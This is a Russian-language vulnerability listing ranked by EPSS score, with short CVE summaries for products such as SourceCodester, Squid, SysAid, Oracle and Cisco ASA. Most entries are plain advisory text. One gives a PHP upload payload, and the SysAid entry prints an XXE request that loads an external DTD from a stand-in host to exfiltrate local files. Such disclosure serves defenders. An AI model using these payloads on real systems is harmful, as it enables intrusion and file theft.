Показать поиск и сортировку
Range: 0.0 - 10.0
Range: 0.000 - 1.000
Оценка EPSS
Оценка: 0.6997
CVSS 3.x
Оценка: 8.8
В SourceCodester Clinics Patient Management System 2.0 обнаружена уязвимость, которая была классифицирована как критическая. Затронута неизвестная функция файла /pms/update_user.php?user_id=1. Манипулирование аргументом profile_picture с вводом <?php phpinfo();?> приводит к неограниченной загрузке. Можно запустить атаку удаленно. Эксплойт был обнародован и может быть использован.
Оценка: 0.6994
CVSS 2.0
Оценка: 5.0
client_side_request.cc в Squid 3.2.x до 3.2.13 и 3.3.x до 3.3.8 позволяет удаленным злоумышленникам вызвать отказ в обслуживании через специально созданный номер порта в заголовке HTTP Host.
Оценка: 0.6993
Оценка: 9.3
Уязвимость format string в службе nsrd RPC в EMC NetWorker 7.6.3 и 7.6.4 до версии 7.6.4.1 и 8.0 до версии 8.0.0.1 позволяет удаленным злоумышленникам выполнять произвольный код через спецификаторы format string в сообщении.
Оценка: 0.6991
Оценка: 6.8
Уязвимость обхода каталогов в функции LaunchProcess в элементе управления ActiveX LaunchHelp.HelpLauncher.1 в LaunchHelp.dll в AdminStudio в Novell ZENworks Configuration Management (ZCM) 10.2, 10.3 и 11 SP1 позволяет удаленным злоумышленникам выполнять произвольные команды через путь к файлу в первом аргументе.
Оценка: 0.6988
Оценка: 4.0
Неуказанная уязвимость в Oracle Java SE 5.0u75, 6u85, 7u72 и 8u25; Java SE Embedded 7u71 и 8u6; и JRockit 27.8.4 и 28.3.4 позволяет удаленным злоумышленникам влиять на конфиденциальность и целостность через векторы, связанные с JSSE.
Оценка: 0.6987
Оценка: 9.8
Плагин MapSVG WordPress до версии 6.2.20 не проверяет и не экранирует параметр через REST API перед использованием его в SQL-запросе, что приводит к SQL-инъекции, эксплуатируемой неаутентифицированными пользователями.
Оценка: 0.6984
Distributed Transaction Controller в Microsoft Windows позволяет удаленным серверам вызывать отказ в обслуживании (зависание службы MSDTC) через специально созданное сообщение Transaction Internet Protocol (TIP), которое заставляет DTC неоднократно подключаться к целевому IP-адресу и номеру порта после возникновения ошибки, также известное как «Уязвимость Distributed TIP».
Оценка: 0.6983
Оценка: 7.5
Уязвимость в продукте Oracle Agile PLM Framework из состава Oracle Supply Chain (компонент: Software Development Kit, Process Extension). Поддерживаемая версия, подверженная уязвимости: 9.3.6. Легко эксплуатируемая уязвимость позволяет не прошедшему проверку подлинности злоумышленнику, имеющему сетевой доступ через HTTP, скомпрометировать Oracle Agile PLM Framework. Успешные атаки с использованием этой уязвимости могут привести к несанкционированному доступу к критически важным данным или полному доступу ко всем данным, доступным для Oracle Agile PLM Framework. Базовая оценка CVSS 3.1 - 7.5 (воздействие на конфиденциальность). Вектор CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
Оценка: 0.6982
Internet Explorer в Windows 10 Gold, 1511, 1607, 1703 и Windows Server 2016 позволяет злоумышленнику обходить политики Device Guard User Mode Code Integrity (UMCI) из-за того, что Internet Explorer не может проверить политики UMCI, также известная как "Уязвимость обхода функции безопасности Internet Explorer".
Оценка: 0.6980
Проблема обнаружена на устройствах TRENDnet TV-IP1314PI 5.5.3 200714. Внедрение команд может произойти из-за того, что функция system используется davinci для распаковки языковых пакетов без строгой фильтрации строк URL.
Оценка: 7.8
Функция snmp_trap_decode в SNMP NAT helper для ядра Linux до 2.6.16.18 позволяет удаленным злоумышленникам вызвать отказ в обслуживании (сбой) через неуказанные удаленные векторы атак, которые вызывают сбои в snmp_trap_decode, которые вызывают (1) освобождение случайной памяти или (2) освобождение ранее освобожденной памяти (double-free) snmp_trap_decode, а также ее вызывающей функцией, как продемонстрировано через определенные тестовые случаи набора тестов PROTOS SNMP.
Оценка: 0.6979
Оценка: 6.1
Межсайтовый скриптинг (XSS).
Версии SysAid On-Prem <= 23.3.40 уязвимы к атаке XXE (XML External Entity) без аутентификации в функциональности Checkin, что позволяет захватить административный аккаунт и получить примитивы чтения файлов [1]. Уязвимость возникает из-за отсутствия надлежащей проверки и санитаризации пользовательского ввода в методе `doPost` класса `GetMdmMessage`. Атакующий может отправить специально сформированный XML-документ, содержащий внешнюю сущность, что приводит к XXE-атаке. Это позволяет злоумышленнику извлекать содержимое локальных файлов или взаимодействовать со службами внутренней сети. В частности, были обнаружены три вектора XXE-атаки: через endpoints `/mdm/checkin`, `/mdm/serverurl` и `/lshw` [2]. Для эксплуатации уязвимости атакующий может отправить POST-запрос на уязвимый endpoint с вредоносным XML-содержимым. Например, запрос к `/mdm/checkin` с заголовком `Content-Type: application/xml` и телом: ``` <?xml version="1.0" ?> <!DOCTYPE foo [ <!ENTITY % foo SYSTEM "http://poc-server/watchTowr.dtd"> %foo; ]> ``` Это приводит к тому, что сервер выполняет запрос к внешней DTD, что подтверждает наличие уязвимости. Используя эту уязвимость, атакующий может извлекать содержимое локальных файлов, таких как `C:\windows\win.ini`, путем использования внешней DTD для exfiltrации данных [1]. Однако было замечено, что полная exfiltrация содержимого файла возможна только для однострочных файлов из-за ограничений в обработке XML-сущностей в Java. Для обхода этого ограничения может быть использован метод error-based XXE, но в данном случае XXE является полностью слепой [2]. Кроме того, злоумышленник может попытаться использовать XXE для взаимодействия со внутренними службами, хотя в данном случае это не привело к повышению привилегий или выполнению команд [1]. Исправление уязвимости требует обновления до исправленной версии SysAid. Источники: - [1] https://documentation.sysaid.com/docs/24-40-60 - [2] https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
Уязвимость в компоненте загрузки файлов, обнаруженная в файле ~/src/Classes/FileUploader.php плагина ProfilePress WordPress, позволила пользователям загружать произвольные файлы во время регистрации пользователя или во время обновления профиля. Эта проблема затрагивает версии 3.0.0 - 3.1.3.
Приложение для обработки документов, используемое Windows Shell в Microsoft Windows 2000, Windows XP и Windows Server 2003, позволяет удаленным злоумышленникам выполнять произвольный код, изменяя CLSID, хранящийся в файле, чтобы он обрабатывался HTML Application Host (MSHTA), как продемонстрировано с использованием документа Microsoft Word.
Оценка: 0.6976
D-Link Go-RT-AC750 GORTAC750_revA_v101b03 и GO-RT-AC750_revB_FWv200b02 уязвимы для переполнения буфера через cgibin, hnap_main.
Оценка: 0.6973
Оценка: 10.0
Переполнение буфера в демоне snmpXdmid SNMP to DMI mapper в Solaris позволяет удаленным злоумышленникам выполнять произвольные команды с помощью длинного события "indication".
Оценка: 9.6
Класс MethodClosure в runtime/MethodClosure.java в Apache Groovy 1.7.0 до 2.4.3 позволяет удаленным злоумышленникам выполнять произвольный код или вызывать отказ в обслуживании через специально созданный сериализованный объект.
В коммутаторах Hewlett Packard Enterprise OfficeConnect 1820, 1850 и 1920S была выявлена потенциальная уязвимость безопасности. Уязвимость может быть удаленно использована для обхода аутентификации. HPE выпустила следующие обновления программного обеспечения для устранения уязвимости в коммутаторах Hewlett Packard Enterprise OfficeConnect 1820, 1850 и 1920S версий: До PT.02.14; До PC.01.22; До PO.01.21; До PD.02.22.
Уязвимость в интерфейсе веб-служб программного обеспечения Cisco Adaptive Security Appliance (ASA) и Cisco Firepower Threat Defense (FTD) может позволить не прошедшему проверку подлинности удаленному злоумышленнику получить содержимое памяти на затронутом устройстве, что может привести к раскрытию конфиденциальной информации. Уязвимость связана с проблемой отслеживания буфера, когда программное обеспечение анализирует недопустимые URL-адреса, запрошенные из интерфейса веб-служб. Злоумышленник может использовать эту уязвимость, отправив специально созданный GET-запрос к интерфейсу веб-служб. Успешная эксплуатация может позволить злоумышленнику получить содержимое памяти, что может привести к раскрытию конфиденциальной информации. Примечание: эта уязвимость затрагивает только определенные конфигурации AnyConnect и WebVPN. Для получения дополнительной информации см. раздел «Уязвимые продукты».
Оценка: 0.6971
Множественные уязвимости обхода каталогов в консоли управления в Symantec Messaging Gateway (SMG) 9.5.x позволяют удаленным аутентифицированным пользователям читать произвольные файлы через .. (две точки) в (1) параметре logFile в действии logs в brightmail/export или (2) параметре localBackupFileSelection в действии APPLIANCE restoreSource в brightmail/admin/restore/download.do.